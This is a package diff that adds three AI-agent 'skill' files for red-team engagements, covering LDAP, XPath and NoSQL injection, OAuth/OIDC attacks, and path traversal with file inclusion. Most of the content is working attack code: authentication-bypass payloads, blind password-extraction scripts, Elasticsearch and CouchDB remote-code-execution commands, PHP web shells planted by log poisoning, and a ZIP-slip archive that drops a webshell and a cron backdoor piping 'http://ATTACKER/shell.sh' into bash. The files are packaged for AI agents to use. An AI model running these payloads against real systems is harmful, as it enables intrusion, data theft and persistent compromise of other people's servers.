rtexit-method 0.1.7 → 0.1.9

package/packaged-assets/.agents/skills/rt-ldap-xpath-injection/SKILL.md

@@ -0,0 +1,228 @@
+---
+name: rt-ldap-xpath-injection
+description: "LDAP injection, XPath injection, and deep NoSQL injection skill for authorized engagements. LDAP authentication bypass via filter injection, LDAP enumeration via blind injection, XPath authentication bypass and data extraction, MongoDB operator injection depth, Elasticsearch injection, and CouchDB HTTP API attacks. Use when applications query LDAP directories, XML datastores, or document databases."
+---
+
+# rt-ldap-xpath-injection — LDAP, XPath & Advanced NoSQL Injection
+
+## Overview
+
+Beyond SQL injection, applications use LDAP (directory services), XPath (XML querying), and NoSQL databases — each with their own injection vulnerabilities. LDAP injection can bypass Windows AD authentication. XPath injection can extract entire XML documents. NoSQL injection bypasses authentication across MongoDB, Redis, and Elasticsearch.
+
+---
+
+## Part 1 — LDAP Injection
+
+### Phase 1 — LDAP Auth Bypass
+
+```bash
+# Vulnerable LDAP filter: (&(uid=USER)(password=PASS))
+
+# Auth bypass — close filter early, always true
+Username: *)(uid=*))(|(uid=*
+Password: anything
+# Resulting filter: (&(uid=*)(uid=*))(|(uid=*)(password=anything))
+# Returns first user → logged in as admin
+
+# Simpler bypass
+Username: admin)(&
+Password: anything
+# Filter: (&(uid=admin)(&)(password=anything)) → uid=admin always true
+
+# Wildcard bypass
+Username: *
+Password: *
+# Filter: (&(uid=*)(password=*)) → matches everyone
+
+# Test with curl (LDAP-backed login form)
+curl -X POST https://target.com/login \
+  -d "username=*)(uid=*))(|(uid=*&password=anything"
+# If logged in as first user → LDAP injection confirmed
+```
+
+### Phase 2 — LDAP Blind Enumeration
+
+```bash
+# Extract data via true/false responses
+# (&(uid=admin)(cn=a*)) → if true: admin's CN starts with 'a'
+
+python3 << 'EOF'
+import requests, string
+
+def test_ldap(filter_payload):
+    r = requests.post("https://target.com/login",
+                      data={"username": filter_payload, "password": "x"})
+    return "Login successful" in r.text or r.status_code == 302
+
+# Enumerate admin's email character by character
+email = ""
+for pos in range(1, 50):
+    for char in string.ascii_lowercase + string.digits + "@._-":
+        # Filter: (&(uid=admin)(mail=FOUND_SO_FAR*))
+        payload = f"admin)(mail={email}{char}*)(uid=admin"
+        if test_ldap(payload):
+            email += char
+            print(f"Email so far: {email}")
+            break
+EOF
+```
+
+---
+
+## Part 2 — XPath Injection
+
+### Phase 3 — XPath Auth Bypass
+
+```bash
+# Vulnerable XPath: //users/user[username/text()='USER' and password/text()='PASS']
+
+# Always true bypass
+Username: ' or '1'='1
+Password: ' or '1'='1
+# Query: //users/user[username/text()='' or '1'='1' and ...]  → all users match
+
+# Comment out password check
+Username: admin'  # XPath has no comments, use other techniques
+# Or: admin' or 'x'='x
+
+# Short-circuit
+Username: ' or 1=1 or '
+Password: x
+```
+
+### Phase 4 — XPath Data Extraction (Blind)
+
+```bash
+# Extract XML document contents via true/false responses
+python3 << 'EOF'
+import requests, string
+
+def test_xpath(payload):
+    r = requests.post("https://target.com/search",
+                      data={"username": payload, "password": "x"})
+    return "success" in r.text.lower()
+
+# Count users
+for n in range(1, 20):
+    if test_xpath(f"x' or count(//user)={n} or 'x'='"):
+        print(f"User count: {n}")
+        break
+
+# Extract first user's password character by character
+result = ""
+for pos in range(1, 30):
+    for char in string.printable:
+        payload = f"x' or substring(//user[1]/password,{pos},1)='{char}' or 'x'='"
+        if test_xpath(payload):
+            result += char
+            print(f"Password so far: {result}")
+            break
+EOF
+```
+
+---
+
+## Part 3 — Advanced NoSQL Injection
+
+### Phase 5 — MongoDB Deep Injection
+
+```bash
+# MongoDB operator injection (beyond basic auth bypass)
+
+# $where JavaScript injection
+curl "https://target.com/api/users?filter[$where]=this.username=='admin'&&this.password.match(/a.*/)"
+
+# $regex for enumeration
+curl "https://target.com/api/users?password[$regex]=^a"
+curl "https://target.com/api/users?password[$regex]=^ab"
+# Binary search to extract password
+
+# Blind MongoDB injection via error timing
+for char in a b c d e f 0 1 2 3 4 5 6 7 8 9; do
+  start=$SECONDS
+  curl -s "https://target.com/api?user[$where]=function(){var x=this.password;if(x[0]=='$char'){sleep(2000)};return true}" > /dev/null
+  elapsed=$((SECONDS - start))
+  [ $elapsed -ge 2 ] && echo "First char: $char" && break
+done
+
+# $lookup for cross-collection access (MongoDB aggregation)
+curl "https://target.com/api/search" \
+  -d '{"$lookup":{"from":"users","localField":"_id","foreignField":"_id","as":"user_data"}}'
+
+# Array operator abuse
+curl "https://target.com/api/users?role[$in][]=admin&role[$in][]=superadmin"
+```
+
+### Phase 6 — Elasticsearch Injection
+
+```bash
+# Elasticsearch HTTP API — often unauthenticated internally
+curl http://ES_IP:9200/_cat/indices?v
+curl http://ES_IP:9200/_search?q=*
+
+# Script injection via Painless/Groovy
+curl -X POST "http://ES_IP:9200/users/_search" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "query": {
+      "bool": {
+        "filter": {
+          "script": {
+            "script": {
+              "source": "Runtime rt = Runtime.getRuntime(); String[] commands = new String[]{\"id\"}; Process proc = rt.exec(commands); proc.waitFor(); return true;",
+              "lang": "painless"
+            }
+          }
+        }
+      }
+    }
+  }'
+
+# CVE-2014-3120 / CVE-2015-1427 (Groovy script RCE — older Elasticsearch)
+curl -X POST "http://ES_IP:9200/_search?pretty" \
+  -d '{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"result":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"exec\",java.lang.String.class).invoke(java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null),\"id\")"}}}'
+```
+
+### Phase 7 — CouchDB HTTP API
+
+```bash
+# CouchDB default: no auth, admin party
+curl http://COUCHDB_IP:5984/          # Server info
+curl http://COUCHDB_IP:5984/_all_dbs  # List all databases
+curl http://COUCHDB_IP:5984/users/_all_docs  # All documents
+
+# Create admin account
+curl -X PUT "http://COUCHDB_IP:5984/_config/admins/attacker" \
+  -d '"password123"'
+
+# CVE-2017-12635 (Privilege escalation via JSON parsing)
+curl -X PUT "http://COUCHDB_IP:5984/_users/org.couchdb.user:attacker" \
+  -H "Content-Type: application/json" \
+  -d '{"type":"user","name":"attacker","roles":["_admin"],"roles":[],"password":"password"}'
+
+# Erlang code execution (CVE-2018-8007)
+curl -X PUT "http://admin:pass@COUCHDB_IP:5984/_config/query_servers/cmd" \
+  -d '"os:cmd(\"id\")"'
+curl -X POST "http://admin:pass@COUCHDB_IP:5984/test/_temp_view" \
+  -d '{"map":"cmd(\"id\")"}'
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** LDAP auth bypass with wildcard · XPath always-true bypass · MongoDB $ne auth bypass
+
+**INTERMEDIATE:** Blind LDAP enumeration · XPath character extraction · MongoDB $regex password extraction
+
+**ADVANCED:** Elasticsearch Painless script injection · CouchDB privilege escalation via CVEs
+
+**EXPERT:** Blind time-based LDAP/XPath · MongoDB $where JavaScript injection · Custom NoSQL query analysis
+
+---
+
+## References
+
+- OWASP LDAP Injection: https://owasp.org/www-community/attacks/LDAP_Injection
+- PortSwigger XPath: https://portswigger.net/web-security/xml/xpath-injection
+- MongoDB injection: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection

package/packaged-assets/.agents/skills/rt-oauth-oidc/SKILL.md

@@ -0,0 +1,260 @@
+---
+name: rt-oauth-oidc
+description: "OAuth 2.0 and OIDC deep attack skill for authorized engagements. Authorization code interception, PKCE bypass, redirect_uri manipulation, state parameter CSRF, implicit flow token theft, client credential abuse, token leakage in referrer headers, JWT attacks on id_token, OAuth misconfiguration in social login, open redirect chaining, and account takeover via OAuth flow manipulation. Use when testing SSO, social login, or any OAuth/OIDC implementation."
+---
+
+# rt-oauth-oidc — OAuth 2.0 & OIDC Deep Attacks
+
+## Overview
+
+OAuth 2.0 is the authorization framework behind every "Login with Google/GitHub/Microsoft" button, API authorization, and SSO system. A single misconfiguration can allow account takeover without credentials. This skill covers the complete OAuth attack surface beyond what rt-exploit-auth covers.
+
+---
+
+## Phase 1 — OAuth Flow Reconnaissance
+
+```bash
+# Identify OAuth flow type
+# Authorization Code: most secure, used by web apps
+# Implicit: deprecated, token in URL fragment → leaks to browser history
+# Client Credentials: machine-to-machine, no user
+# Device Code: IoT/CLI (see rt-azure-ad)
+
+# Find OAuth endpoints
+curl https://target.com/.well-known/openid-configuration
+# Reveals: authorization_endpoint, token_endpoint, jwks_uri, etc.
+
+# Or discover manually
+# Look for: /oauth/authorize, /oauth/token, /connect/authorize
+# Check login buttons → inspect redirect URLs
+
+# Extract OAuth parameters from auth request
+# GET /oauth/authorize?
+#   response_type=code
+#   &client_id=CLIENT_ID
+#   &redirect_uri=https://target.com/callback
+#   &scope=openid profile email
+#   &state=RANDOM_STATE
+
+# Key parameters to attack:
+# redirect_uri  → manipulation
+# state         → CSRF if missing/weak
+# scope         → escalation
+# response_type → implicit flow downgrade
+```
+
+---
+
+## Phase 2 — redirect_uri Manipulation
+
+```bash
+# If redirect_uri not strictly validated → steal authorization code
+
+# Test 1: Extra path component
+redirect_uri=https://target.com/callback/../../attacker.com
+
+# Test 2: Subdomain (if wildcard allowed)
+redirect_uri=https://attacker.target.com/callback
+
+# Test 3: Different path (if prefix match only)
+redirect_uri=https://target.com/callback@attacker.com
+redirect_uri=https://target.com/callback%0d%0aattacker.com
+
+# Test 4: Open redirect chaining
+# target.com has open redirect at /redirect?url=
+redirect_uri=https://target.com/redirect?url=https://attacker.com
+
+# Test 5: localhost (if allowed in dev mode)
+redirect_uri=http://localhost:8080
+
+# Full attack: craft auth URL with manipulated redirect
+evil_url="https://idp.target.com/oauth/authorize?response_type=code&client_id=CLIENT_ID&redirect_uri=https://target.com/redirect?url=https://attacker.com&scope=openid"
+
+# Victim clicks link → code sent to attacker.com
+# GET https://attacker.com/?code=AUTH_CODE&state=STATE
+
+# Exchange stolen code for tokens
+curl -X POST https://idp.target.com/oauth/token \
+  -d "grant_type=authorization_code&code=AUTH_CODE&redirect_uri=...&client_id=CLIENT_ID&client_secret=CLIENT_SECRET"
+```
+
+---
+
+## Phase 3 — State Parameter CSRF
+
+```bash
+# If state parameter is missing or not validated → CSRF → account linking attack
+
+# Scenario: target app allows linking social accounts
+# 1. Attacker initiates "Link Google Account" on their account
+# 2. OAuth flow starts, state=ATTACKER_STATE
+# 3. Attacker stops before completing, copies callback URL:
+#    https://target.com/oauth/callback?code=ATTACKER_CODE&state=ATTACKER_STATE
+# 4. Tricks victim into visiting that URL (CSRF)
+# 5. Victim's session completes the OAuth → links attacker's Google to victim's account
+# 6. Attacker can now log in as victim using their own Google account
+
+# Test: remove state parameter
+# Modify the callback URL, remove &state=...
+# If application accepts → CSRF vulnerable
+
+# Test: static/predictable state
+# If state = timestamp or sequential number → predictable → CSRF possible
+```
+
+---
+
+## Phase 4 — Scope Escalation
+
+```bash
+# Request more permissions than intended
+
+# Add privileged scopes to authorization request
+# Normal: scope=openid profile email
+# Attack: scope=openid profile email admin write:all
+
+# Try undocumented scopes
+scope=openid profile email offline_access  # Get refresh token
+scope=openid profile email api:admin
+scope=openid profile email user:* groups:*
+
+# Scope downgrade for different code paths
+# Request minimal scope → bypass security checks designed for full scope flows
+
+# Google OAuth scope escalation (if any Google scope accepted)
+scope=https://www.googleapis.com/auth/gmail.readonly  # Read all emails
+scope=https://www.googleapis.com/auth/drive  # Access Google Drive
+# Add to existing consent → may auto-approve
+```
+
+---
+
+## Phase 5 — Token Leakage
+
+```bash
+# Access tokens leak through various channels
+
+# Referrer header leakage
+# If app redirects to external site after OAuth with token in URL:
+# https://target.com/dashboard#access_token=TOKEN → external image → Referer header leaks token
+
+# Browser history leakage (implicit flow)
+# Implicit flow: token in URL fragment → stays in browser history
+# After XSS: window.location.hash → steal token from history
+
+# Log file leakage
+# Tokens in server logs if in URL params
+# Check: access logs, error logs, analytics tools
+# Tools: grep for "access_token\|id_token\|token=" in exported logs
+
+# JWT id_token analysis
+# Decode with jwt.io or:
+echo "eyJhbGci..." | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
+# Look for: role claims, email, account_id — may be tamperable if weak secret
+
+# JWT attacks on id_token (see also rt-exploit-jwt)
+python3 jwt_tool.py ID_TOKEN -X a  # Algorithm none
+python3 jwt_tool.py ID_TOKEN -X k -pk pubkey.pem  # RS256→HS256
+```
+
+---
+
+## Phase 6 — Client Credential Abuse
+
+```bash
+# Find OAuth client_id and client_secret in source code / repos
+grep -r "client_secret\|CLIENT_SECRET\|oauth_secret" .
+trufflehog github --org=TARGET_ORG --only-verified | grep -i "oauth\|client_secret"
+
+# Test client credentials directly
+curl -X POST https://idp.target.com/oauth/token \
+  -d "grant_type=client_credentials&client_id=FOUND_ID&client_secret=FOUND_SECRET&scope=api:read"
+
+# If valid → you have machine-to-machine access to all APIs
+# client_credentials tokens often have broader scope than user tokens
+
+# Client secret brute force (if short/predictable)
+for secret in $(cat common_secrets.txt); do
+  response=$(curl -s -o /dev/null -w "%{http_code}" \
+    -X POST https://idp.target.com/oauth/token \
+    -d "grant_type=client_credentials&client_id=KNOWN_CLIENT_ID&client_secret=$secret")
+  [ "$response" = "200" ] && echo "FOUND: $secret"
+done
+```
+
+---
+
+## Phase 7 — Account Takeover via OAuth
+
+```bash
+# Pre-account takeover
+# 1. Target app allows social login (OAuth)
+# 2. Attacker creates account with victim's email via password registration
+# 3. Victim later tries "Login with Google" using same email
+# 4. App links Google account to existing (attacker's) account
+# 5. Attacker can now access victim's account via their own Google login
+
+# Test:
+# 1. Register account: victim@gmail.com with password
+# 2. Log out
+# 3. Try "Login with Google" with victim@gmail.com
+# 4. If login succeeds → account takeover via pre-registration
+
+# OAuth login bypass via email matching
+# App looks up user by email from OAuth provider
+# If provider email is attacker-controlled → register with victim's email format
+# GitHub OAuth: github.com allows setting primary email → abuse for email matching
+
+# Forced re-linking attack
+# 1. Find "Connect Social Account" feature
+# 2. Intercept OAuth callback
+# 3. Replay callback in victim's session (CSRF if state not validated)
+```
+
+---
+
+## Phase 8 — PKCE Bypass
+
+```bash
+# PKCE (Proof Key for Code Exchange) prevents code theft
+# code_verifier → SHA256 hash → code_challenge
+# Sent with auth request → verified at token exchange
+
+# Test 1: PKCE not enforced (most common issue)
+# Remove code_verifier from token exchange request
+curl -X POST https://idp.target.com/oauth/token \
+  -d "grant_type=authorization_code&code=STOLEN_CODE&redirect_uri=...&client_id=...
+      # NO code_verifier parameter"
+# If exchange succeeds → PKCE not enforced → stolen codes work
+
+# Test 2: PKCE with plain method (downgrade)
+# Send code_challenge_method=plain → code_challenge = code_verifier in plaintext
+# Intercept authorization request → read code_challenge → you have the verifier
+curl -X POST https://idp.target.com/oauth/token \
+  -d "grant_type=authorization_code&code=CODE&code_verifier=CHALLENGE_FROM_URL"
+
+# Test 3: Weak verifier entropy
+# Some implementations use predictable code_verifiers
+# Monitor multiple auth flows → look for patterns
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Decode JWT id_token · Test state parameter presence · Test redirect_uri with simple variants
+
+**INTERMEDIATE:** Scope escalation · Client secret extraction from source · Pre-account takeover · PKCE enforcement test
+
+**ADVANCED:** Open redirect chaining for code theft · CSRF via missing state · Token leakage via referrer
+
+**EXPERT:** Full account takeover chains · Custom PKCE downgrade · Cross-provider OAuth confusion attacks
+
+---
+
+## References
+
+- PortSwigger OAuth: https://portswigger.net/web-security/oauth
+- OAuth security best practices: https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics
+- jwt_tool: https://github.com/ticarpi/jwt_tool
+- MITRE T1550.001: https://attack.mitre.org/techniques/T1550/001/

package/packaged-assets/.agents/skills/rt-path-traversal/SKILL.md

@@ -0,0 +1,172 @@
+---
+name: rt-path-traversal
+description: "Path traversal, Local File Inclusion (LFI), and Remote File Inclusion (RFI) skill for authorized engagements. Directory traversal to /etc/passwd, LFI via PHP wrappers, LFI to RCE via log poisoning and /proc/self/environ, ZIP slip file upload attacks, null byte injection, encoding bypasses, and RFI for remote code execution. Use when applications load files based on user input."
+---
+
+# rt-path-traversal — Path Traversal, LFI & RFI
+
+## Overview
+
+Path traversal and file inclusion vulnerabilities let attackers read arbitrary files (LFI) or include remote malicious code (RFI) by manipulating file path parameters. LFI escalates to RCE via log poisoning, PHP wrappers, or /proc pseudo-filesystem abuse.
+
+---
+
+## Phase 1 — Path Traversal Detection
+
+```bash
+# Basic traversal
+https://target.com/download?file=../../../etc/passwd
+https://target.com/view?page=../../../../etc/shadow
+https://target.com/load?template=../../config.php
+
+# Encoding bypasses
+../             → %2e%2e%2f
+../             → ..%2f
+../             → %2e%2e/
+../             → ....//          (double dot slash)
+../             → ..%252f         (double URL encode)
+../             → ..%c0%af        (overlong UTF-8)
+
+# Null byte (bypass file extension check in old PHP)
+?file=../../../../etc/passwd%00.png
+# PHP < 5.3: %00 truncates string → .png ignored
+
+# Automated with ffuf
+ffuf -u "https://target.com/file?name=FUZZ" \
+  -w /opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt \
+  -mr "root:x\|\\[boot loader\\]"
+```
+
+---
+
+## Phase 2 — LFI Sensitive File Targets
+
+```bash
+# Linux
+/etc/passwd           # User accounts
+/etc/shadow           # Password hashes (root only)
+/etc/hosts            # Internal hostnames
+/etc/crontab          # Scheduled tasks
+/proc/self/environ    # Environment variables (may have DB passwords)
+/proc/self/cmdline    # Current process command line
+/proc/self/fd/        # Open file descriptors
+/var/log/apache2/access.log   # Apache access log (for log poisoning)
+/var/log/nginx/access.log     # Nginx access log
+/var/log/auth.log             # SSH auth logs
+/var/mail/www-data            # Mail spool
+/home/user/.ssh/id_rsa        # SSH private key
+/home/user/.bash_history      # Command history
+/var/www/html/.env            # Laravel/Symfony secrets
+/var/www/html/config.php      # App database credentials
+
+# Windows
+C:\Windows\win.ini
+C:\Windows\System32\drivers\etc\hosts
+C:\inetpub\wwwroot\web.config
+C:\xampp\apache\logs\access.log
+C:\wamp\logs\access.log
+C:\Users\Administrator\Desktop\
+```
+
+---
+
+## Phase 3 — LFI to RCE
+
+```bash
+# Method 1: Apache/Nginx Log Poisoning
+# Step 1: Inject PHP into User-Agent (written to access.log)
+curl "https://target.com/" -A "<?php system(\$_GET['cmd']); ?>"
+
+# Step 2: Include the log file
+https://target.com/page?file=/var/log/apache2/access.log&cmd=id
+# PHP executes the shell code in the log
+
+# Method 2: /proc/self/environ
+# Set PHP in User-Agent
+curl "https://target.com/" -A "<?php system(\$_GET['c']); ?>"
+# Include environ
+https://target.com/page?file=/proc/self/environ&c=id
+
+# Method 3: SSH Log Poisoning
+# SSH as: ssh '<?php system($_GET["cmd"]); ?>'@target.com
+# Include: /var/log/auth.log
+
+# Method 4: PHP Wrappers
+# php://filter — read PHP source
+https://target.com/page?file=php://filter/convert.base64-encode/resource=config.php
+
+# php://input — execute POST body as PHP (requires allow_url_include)
+curl "https://target.com/page?file=php://input" -d "<?php system('id'); ?>"
+
+# data:// wrapper — include inline PHP
+https://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
+# base64 of: <?php system('id'); ?>
+
+# phar:// — PHP archive code execution
+# Create phar with PHP payload
+php -r "
+\$p = new Phar('shell.phar');
+\$p['shell.php'] = '<?php system(\$_GET[\"c\"]); ?>';
+\$p->stopBuffering();
+"
+# Upload phar as image (phar magic bytes don't look like PHP)
+# Include: ?file=phar://uploads/shell.phar/shell.php&c=id
+```
+
+---
+
+## Phase 4 — RFI (Remote File Inclusion)
+
+```bash
+# Requires: allow_url_include = On in PHP (less common now)
+# Host malicious PHP
+echo '<?php system($_GET["c"]); ?>' > shell.txt
+python3 -m http.server 8080
+
+# Include remote file
+https://target.com/page?file=http://ATTACKER_IP:8080/shell.txt&c=id
+
+# SMB-based RFI (Windows targets)
+# Host share: smbserver.py -smb2support share /tmp/
+https://target.com/page?file=\\ATTACKER_IP\share\shell.php&c=whoami
+```
+
+---
+
+## Phase 5 — ZIP Slip / Archive Path Traversal
+
+```python
+# Malicious ZIP with path traversal in filename
+import zipfile
+
+with zipfile.ZipFile("zipslip.zip", "w") as z:
+    # Traverse to webroot
+    z.writestr("../../var/www/html/shell.php",
+               "<?php system($_GET['c']); ?>")
+    z.writestr("../../etc/cron.d/backdoor",
+               "* * * * * root curl http://ATTACKER/shell.sh | bash")
+
+# Upload → server extracts → shell.php written to webroot
+curl https://target.com/upload -F "archive=@zipslip.zip"
+curl https://target.com/shell.php?c=id
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Basic ../ traversal for /etc/passwd · PHP filter wrapper for source read
+
+**INTERMEDIATE:** Log poisoning for LFI→RCE · php://input execution · ZIP Slip
+
+**ADVANCED:** phar:// deserialization · /proc/ exploitation · Encoding bypass chains
+
+**EXPERT:** Blind LFI detection via timing · Custom encoding chains · LFI in binary protocols
+
+---
+
+## References
+
+- PortSwigger Path Traversal: https://portswigger.net/web-security/file-path-traversal
+- PayloadsAllTheThings LFI: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
+- LFI to RCE techniques: https://www.hackingarticles.in/comprehensive-guide-to-local-file-inclusion/